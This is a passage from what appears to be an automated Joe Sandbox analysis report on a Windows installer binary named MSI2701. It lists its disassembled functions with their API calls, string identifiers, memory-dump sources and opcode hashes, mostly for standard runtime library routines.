                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __freea$__alloca_probe_16
                                                                                                                                                            • String ID: a/p$am/pm
                                                                                                                                                            • API String ID: 3509577899-3206640213
                                                                                                                                                            • Opcode ID: 4cb342339ab31c178d8aab9448ab07f9560f96b78b34634d596ebccb295160a2
                                                                                                                                                            • Instruction ID: 10c9d3e6ae1c215e9e95d08f7ebaf97c607f0ecef7f58eef69afa2f05533a6d9
                                                                                                                                                            • Opcode Fuzzy Hash: 4cb342339ab31c178d8aab9448ab07f9560f96b78b34634d596ebccb295160a2
                                                                                                                                                            • Instruction Fuzzy Hash: 76C1C23590020ADADB24EF69C9856BBB7B0FF85304F14408BE705AB752D279AC42CF5A
                                                                                                                                                            Function 004C5890 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 60COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,?,76ED4450,004C5646,?,?,?,?,?), ref: 004C5898
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                            • String ID: <SQ$Call to ShellExecuteEx() returned:$Last error=$false$true
                                                                                                                                                            • API String ID: 1452528299-943509545
                                                                                                                                                            • Opcode ID: 88d7902891cc455e5defaa052ab5411120c5a523090ce5dd88eb70fdcfe32717
                                                                                                                                                            • Instruction ID: 03086f2d8d90fecc06037fc2983a64bcc50ea851605dfc861e3590f0890f9c00
                                                                                                                                                            • Opcode Fuzzy Hash: 88d7902891cc455e5defaa052ab5411120c5a523090ce5dd88eb70fdcfe32717
                                                                                                                                                            • Instruction Fuzzy Hash: AA11A05EA10622C6DB702F6C9800B6BA6E4EF90754F65087FD88887391F6B98CC18398
                                                                                                                                                            Function 004E5978 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetLastError.KERNEL32(?,?,004E596F,004E4900,004E358F), ref: 004E5986
                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004E5994
                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004E59AD
                                                                                                                                                            • SetLastError.KERNEL32(00000000,004E596F,004E4900,004E358F), ref: 004E59FF
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                            • Opcode ID: 56fd5590e050d63ecd0a6cff4e533b7a72852f2293a634ba620e825b21884749
                                                                                                                                                            • Instruction ID: f7cdb124b058aa12413b354d6fe2423bed7824bccff2eeceaf697e66ab9ad215
                                                                                                                                                            • Opcode Fuzzy Hash: 56fd5590e050d63ecd0a6cff4e533b7a72852f2293a634ba620e825b21884749
                                                                                                                                                            • Instruction Fuzzy Hash: 9201F972209A51DFA62017776C899EF1B54DB2537FB20032FF114842E2EF191C056198
                                                                                                                                                            Function 004D35F7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 282COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _strcspn$H_prolog3_ctype
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 838279627-2395104290
                                                                                                                                                            • Opcode ID: 38f5b459090c7e3cbab85acff1ca347675d452f4318e8ef95351c1afaf236c24
                                                                                                                                                            • Instruction ID: 06b2d738c2c4cabc2d21063fb3455068dc2c6c90f013bd7a2d70da3eeeb9f5a5
                                                                                                                                                            • Opcode Fuzzy Hash: 38f5b459090c7e3cbab85acff1ca347675d452f4318e8ef95351c1afaf236c24
                                                                                                                                                            • Instruction Fuzzy Hash: A7B16AB5900249AFDF11DF99C994AEEBBB5FF48305F14401BE805AB311D338AE52CB69
                                                                                                                                                            Function 004CDA6F Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _strcspn$H_prolog3_ctype
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 838279627-2395104290
                                                                                                                                                            • Opcode ID: 311b54889969cc42860a74734b2a73b186f265207134124a8484b6a180c873ed
                                                                                                                                                            • Instruction ID: 302c10278438cd4c28f8ae8440ef2b296939b125ef76306281b70e32a939ad2f
                                                                                                                                                            • Opcode Fuzzy Hash: 311b54889969cc42860a74734b2a73b186f265207134124a8484b6a180c873ed
                                                                                                                                                            • Instruction Fuzzy Hash: 8EB14B79D002499FDF50DF94C981EEEBBB9EF08304F14402EE805AB215D778AE46CB69
                                                                                                                                                            Function 004C3230 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 260fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetTempFileNameW.KERNEL32(?,URL,00000000,?,C7C71CC4,?,00000004), ref: 004C3294
                                                                                                                                                            • MoveFileW.KERNEL32(?,00000000), ref: 004C354A
                                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 004C3592
                                                                                                                                                              • Part of subcall function 004C1A70: LocalAlloc.KERNEL32(00000040,80000022), ref: 004C1AF7
                                                                                                                                                              • Part of subcall function 004C1A70: LocalFree.KERNEL32(7FFFFFFE), ref: 004C1B7D
                                                                                                                                                              • Part of subcall function 004C2E60: LocalFree.KERNEL32(?,C7C71CC4,?,?,00503C40,000000FF,?,004C1242,C7C71CC4,?,?,00503C75,000000FF), ref: 004C2EB1
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileLocal$Free$AllocDeleteMoveNameTemp
                                                                                                                                                            • String ID: URL$url
                                                                                                                                                            • API String ID: 853893950-346267919
                                                                                                                                                            • Opcode ID: c46b96f0a1463d11721216660785767212f8fa61eb4312259329087b6855e587
                                                                                                                                                            • Instruction ID: b39c4ec2276dae9849aadb7e2e0ea57cee7de098a848b71eafe68de1c5596463
                                                                                                                                                            • Opcode Fuzzy Hash: c46b96f0a1463d11721216660785767212f8fa61eb4312259329087b6855e587
                                                                                                                                                            • Instruction Fuzzy Hash: FDC17A74D142689ADB64DF24CC98BDDB7B4BF14308F1042DED009A7291EBB96B88CF95
                                                                                                                                                            Function 004E5A58 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AdjustPointer
                                                                                                                                                            • String ID: 2N
                                                                                                                                                            • API String ID: 1740715915-2395104290
                                                                                                                                                            • Opcode ID: 3de092ee864632f135ba9ed3716c84f6dc09fbb53b343557dc92a929b9778e1a
                                                                                                                                                            • Instruction ID: e79698d96922f218bdc2a7fb017bb5232d61521a9eeea96c3a88f3fefb08a839
                                                                                                                                                            • Opcode Fuzzy Hash: 3de092ee864632f135ba9ed3716c84f6dc09fbb53b343557dc92a929b9778e1a
                                                                                                                                                            • Instruction Fuzzy Hash: BE510472A00B869FDB299F13D851B6A77A4FF4431AF14462FE90187291E738FC40C758
                                                                                                                                                            Function 004C36D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129libraryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 004C3735
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00504215,000000FF), ref: 004C381A
                                                                                                                                                              • Part of subcall function 004C2310: GetProcessHeap.KERNEL32 ref: 004C2365
                                                                                                                                                              • Part of subcall function 004C46F0: FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,?,?,?,?,004C3778,-00000010,?,?,?,00504215,000000FF), ref: 004C4736
                                                                                                                                                            • _wcschr.LIBVCRUNTIME ref: 004C37C6
                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00504215,000000FF), ref: 004C37DB
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: DirectoryErrorFindHeapLastLibraryLoadProcessResourceSystem_wcschr
                                                                                                                                                            • String ID: ntdll.dll
                                                                                                                                                            • API String ID: 3941625479-2227199552
                                                                                                                                                            • Opcode ID: d4fa521a0c3ab60e3e83c1fa2ade6747e1ae57f2b096e1a70b61b4324762c8ee
                                                                                                                                                            • Instruction ID: c8f22cac85ea2d14e192f5a574ad8170f5c6cba9e68dc23c37db47a1a117c8a5
                                                                                                                                                            • Opcode Fuzzy Hash: d4fa521a0c3ab60e3e83c1fa2ade6747e1ae57f2b096e1a70b61b4324762c8ee
                                                                                                                                                            • Instruction Fuzzy Hash: 8B4105746006059FDB50DF69CC58FAEB7F4FF04301F14852EE91697281EBB8AA04CBA4
                                                                                                                                                            Function 004DD3CB Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 104COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 004DD3D2
                                                                                                                                                              • Part of subcall function 004D254E: __EH_prolog3.LIBCMT ref: 004D2555
                                                                                                                                                              • Part of subcall function 004D254E: std::_Lockit::_Lockit.LIBCPMT ref: 004D255F
                                                                                                                                                              • Part of subcall function 004D254E: std::_Lockit::~_Lockit.LIBCPMT ref: 004D25D0
                                                                                                                                                            • _Find_elem.LIBCPMT ref: 004DD46E
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                            • String ID: 2N$%.0Lf$0123456789-
                                                                                                                                                            • API String ID: 2544715827-1323058517
                                                                                                                                                            • Opcode ID: 717db628bee6ac66a31820d3916f251fa30794d278cfc882ba42174a228cce5c
                                                                                                                                                            • Instruction ID: 5ffc4c15a1f1e6ef1a989f86d092b745456809597c0c3ece1d9d12ab9c1aef3b
                                                                                                                                                            • Opcode Fuzzy Hash: 717db628bee6ac66a31820d3916f251fa30794d278cfc882ba42174a228cce5c
                                                                                                                                                            • Instruction Fuzzy Hash: 50415C31900218DFCF15DFA5D994ADD7BB5BF09318F00015BE801AB255DB38AA56CB99
                                                                                                                                                            Function 004DD66F Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 104COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 004DD676
                                                                                                                                                              • Part of subcall function 004C8610: std::_Lockit::_Lockit.LIBCPMT ref: 004C8657
                                                                                                                                                              • Part of subcall function 004C8610: std::_Lockit::_Lockit.LIBCPMT ref: 004C8679
                                                                                                                                                              • Part of subcall function 004C8610: std::_Lockit::~_Lockit.LIBCPMT ref: 004C86A1
                                                                                                                                                              • Part of subcall function 004C8610: std::_Lockit::~_Lockit.LIBCPMT ref: 004C880E
                                                                                                                                                            • _Find_elem.LIBCPMT ref: 004DD712
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                            • String ID: 2N$0123456789-$0123456789-
                                                                                                                                                            • API String ID: 3042121994-3087677497
                                                                                                                                                            • Opcode ID: 315028368632135bef814db3bae9911bf38c70efb4e1e4b16b86fcb145b28880
                                                                                                                                                            • Instruction ID: 10c2e1c7081276661951768a9e8699e0f893b0b9e961edf7f98532f1d4c0157c
                                                                                                                                                            • Opcode Fuzzy Hash: 315028368632135bef814db3bae9911bf38c70efb4e1e4b16b86fcb145b28880
                                                                                                                                                            • Instruction Fuzzy Hash: 43418C75900218DFCF15DFA4C890ADE7BB5BF09314F10009FE811AB251DB38EA56CB99
                                                                                                                                                            Function 004E175A Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 104COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 004E1761
                                                                                                                                                              • Part of subcall function 004C9270: std::_Lockit::_Lockit.LIBCPMT ref: 004C92A0
                                                                                                                                                              • Part of subcall function 004C9270: std::_Lockit::_Lockit.LIBCPMT ref: 004C92C2
                                                                                                                                                              • Part of subcall function 004C9270: std::_Lockit::~_Lockit.LIBCPMT ref: 004C92EA
                                                                                                                                                              • Part of subcall function 004C9270: std::_Lockit::~_Lockit.LIBCPMT ref: 004C9422
                                                                                                                                                            • _Find_elem.LIBCPMT ref: 004E17FB
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                            • String ID: 2N$0123456789-$0123456789-
                                                                                                                                                            • API String ID: 3042121994-3087677497
                                                                                                                                                            • Opcode ID: 4efe91124b304c1e9f8865763abfe7fb59c47dd94f886d7694dbc3d629fe3f64
                                                                                                                                                            • Instruction ID: bf6ae9e4c28fb37a7b93015dcec27b0ce0a2202d08a92dff4a56cccf7adaf3fb
                                                                                                                                                            • Opcode Fuzzy Hash: 4efe91124b304c1e9f8865763abfe7fb59c47dd94f886d7694dbc3d629fe3f64
                                                                                                                                                            • Instruction Fuzzy Hash: 74418F35900249EFCF05EFA5D981AAEBBB5BF04315F10005FF811AB262DB789A46CB59
                                                                                                                                                            Function 004C621F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77libraryloaderCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 004C1A20: LocalFree.KERNEL32(?), ref: 004C1A42
                                                                                                                                                              • Part of subcall function 004E3E5A: RaiseException.KERNEL32(E06D7363,00000001,00000003,004C1434,?,?,004CD341,004C1434,00518B5C,?,004C1434,?,00000000), ref: 004E3EBA
                                                                                                                                                            • GetCurrentProcess.KERNEL32(C7C71CC4,C7C71CC4,?,?,00000000,00504981,000000FF), ref: 004C62EB
                                                                                                                                                              • Part of subcall function 004E2C98: EnterCriticalSection.KERNEL32(0051DD3C,?,?,?,004C23B6,0051E638,C7C71CC4,?,?,00503D6D,000000FF), ref: 004E2CA3
                                                                                                                                                              • Part of subcall function 004E2C98: LeaveCriticalSection.KERNEL32(0051DD3C,?,?,?,004C23B6,0051E638,C7C71CC4,?,?,00503D6D,000000FF), ref: 004E2CE0
                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 004C62B0
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004C62B7
                                                                                                                                                              • Part of subcall function 004E2C4E: EnterCriticalSection.KERNEL32(0051DD3C,?,?,004C2427,0051E638,00506B40), ref: 004E2C58
                                                                                                                                                              • Part of subcall function 004E2C4E: LeaveCriticalSection.KERNEL32(0051DD3C,?,?,004C2427,0051E638,00506B40), ref: 004E2C8B
                                                                                                                                                              • Part of subcall function 004E2C4E: RtlWakeAllConditionVariable.NTDLL ref: 004E2D02
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalSection$EnterLeave$AddressConditionCurrentExceptionFreeHandleLocalModuleProcProcessRaiseVariableWake
                                                                                                                                                            • String ID: IsWow64Process$kernel32
                                                                                                                                                            • API String ID: 1333104975-3789238822
                                                                                                                                                            • Opcode ID: 4a48965efdb5a4ed07a338416c536a1eb7852d7c219c4687180dc194e9a9b1a6
                                                                                                                                                            • Instruction ID: 00c0fa46a880388f3df482805cee561784845cfe26164303ef917091357bbbea
                                                                                                                                                            • Opcode Fuzzy Hash: 4a48965efdb5a4ed07a338416c536a1eb7852d7c219c4687180dc194e9a9b1a6
                                                                                                                                                            • Instruction Fuzzy Hash: 2621D175E04244DFDB10DF94DD46F9EBB68FB28B10F10422EE911932D0E77865048A55
                                                                                                                                                            Function 004D8451 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Mpunct$GetvalsH_prolog3
                                                                                                                                                            • String ID: $+xv
                                                                                                                                                            • API String ID: 2204710431-1686923651
                                                                                                                                                            • Opcode ID: 65d7938f1082a06e71acdb627ee02df447f4d0dfd15ed2383ba8aff8e96f22a4
                                                                                                                                                            • Instruction ID: 49de14e35e0ba9cb01bf4d04cdf53b2d86a1fde1d270d6400a3dc709febe72ad
                                                                                                                                                            • Opcode Fuzzy Hash: 65d7938f1082a06e71acdb627ee02df447f4d0dfd15ed2383ba8aff8e96f22a4
                                                                                                                                                            • Instruction Fuzzy Hash: 1F21A7B1904B926ED725DF7684A077B7EF8AB08305F04455FE499C7B42E738E601CB94
                                                                                                                                                            Function 004C6250 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62libraryloaderCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetCurrentProcess.KERNEL32(C7C71CC4,C7C71CC4,?,?,00000000,00504981,000000FF), ref: 004C62EB
                                                                                                                                                              • Part of subcall function 004E2C98: EnterCriticalSection.KERNEL32(0051DD3C,?,?,?,004C23B6,0051E638,C7C71CC4,?,?,00503D6D,000000FF), ref: 004E2CA3
                                                                                                                                                              • Part of subcall function 004E2C98: LeaveCriticalSection.KERNEL32(0051DD3C,?,?,?,004C23B6,0051E638,C7C71CC4,?,?,00503D6D,000000FF), ref: 004E2CE0
                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 004C62B0
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004C62B7
                                                                                                                                                              • Part of subcall function 004E2C4E: EnterCriticalSection.KERNEL32(0051DD3C,?,?,004C2427,0051E638,00506B40), ref: 004E2C58
                                                                                                                                                              • Part of subcall function 004E2C4E: LeaveCriticalSection.KERNEL32(0051DD3C,?,?,004C2427,0051E638,00506B40), ref: 004E2C8B
                                                                                                                                                              • Part of subcall function 004E2C4E: RtlWakeAllConditionVariable.NTDLL ref: 004E2D02
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.1449264000.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.1449221194.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449400787.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.1449426865.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_4c0000_MSI2701.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
                                                                                                                                                            • String ID: IsWow64Process$kernel32
                                                                                                                                                            • API String ID: 2056477612-3789238822
                                                                                                                                                            • Opcode ID: b6b05206ae5c93c61bc63f2b671f175afb227e497d35c13344e4595937f7fab7
                                                                                                                                                            • Instruction ID: 1173e6332ab213d04670d2e0ac859eb813da3fd0895adeb72d13c841d3e2bc59
